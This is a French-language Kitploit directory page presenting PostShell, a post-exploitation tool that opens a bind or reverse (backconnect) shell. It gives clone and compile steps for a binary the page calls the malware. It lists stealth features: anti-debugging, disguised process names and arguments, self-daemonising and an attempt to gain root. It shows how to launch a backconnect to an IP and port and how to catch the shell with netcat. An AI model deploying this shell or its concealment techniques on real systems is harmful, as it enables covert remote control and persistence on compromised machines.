Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
postshell — PostShell - Shell de post-exploitation de type bind/backconnect | Kitploit
Outils/GitHubGitHub/rek7/postshell
Escalade de PrivilègesGénération de PayloadsMécanismes de PersistanceShellcodePost-ExploitationCommandement et ContrôleRed TeamingAnti-Bot
GitHubrek7/postshell

postshell

PostShell - Shell de post-exploitation de type bind/backconnect

Voir le dépôt
8119il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PostShell

PostShell est un shell de post-exploitation qui inclut à la fois un shell bind et un shell de back connect. Il crée un TTY entièrement interactif permettant le contrôle des tâches. La taille du stub est d'environ 14 Ko et peut être compilé sur tout système de type Unix.

Captures d'écran

Capture d'écran Bannière et interaction avec le shell après le démarrage d'une connexion.

Pourquoi ne pas utiliser un shell Backconnect/Bind traditionnel ?

PostShell permet une post-exploitation plus facile en rendant l'attaquant moins dépendant de dépendances telles que Python et Perl. Il intègre également à la fois un shell de back connect et un shell bind, ce qui signifie que si une cible n'autorise pas les connexions sortantes, un opérateur peut simplement démarrer un shell bind et se connecter à la machine à distance. PostShell est également nettement moins suspect qu'un shell traditionnel car le nom des processus et les arguments sont tous deux masqués.

Fonctionnalités

  • Anti-Débogage, si ptrace est détecté comme étant attaché au shell, il se ferme.
  • Les noms de processus/noms de threads sont masqués, un faux nom écrase tous les arguments système et le nom du fichier pour donner l'impression d'un programme légitime.
  • TTY, un TTY est créé qui permet essentiellement la même utilisation de la machine que si vous étiez connecté via SSH.
  • Shell Bind/Backconnect, à la fois un shell bind et un back connect peuvent être créés.
  • Petite taille du stub, un très petit stub (<14 Ko) est généralement généré.
  • Se démonifie automatiquement
  • Tente de définir GUID/UID à 0 (root)

Pour commencer

  1. Téléchargement : git clone https://github.com/rek7/postshell
  2. Compilation : cd postshell && sh compile.sh Cela devrait créer un binaire appelé "stub" qui est le logiciel malveillant.

Commandes

root@kitploit:~
$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Exemple d'utilisation

Backconnect :

root@kitploit:~
$ ./stub 127.0.0.1 13377

Shell Bind :

root@kitploit:~
$ ./stub 13377

Recevoir une connexion avec Netcat

Réception d'un backconnect :

root@kitploit:~
$ nc -vlp port

Connexion à un shell Bind :

root@kitploit:~
$ nc host port

À faire :

  • Ajouter la résolution de domaine
Télécharger l’outil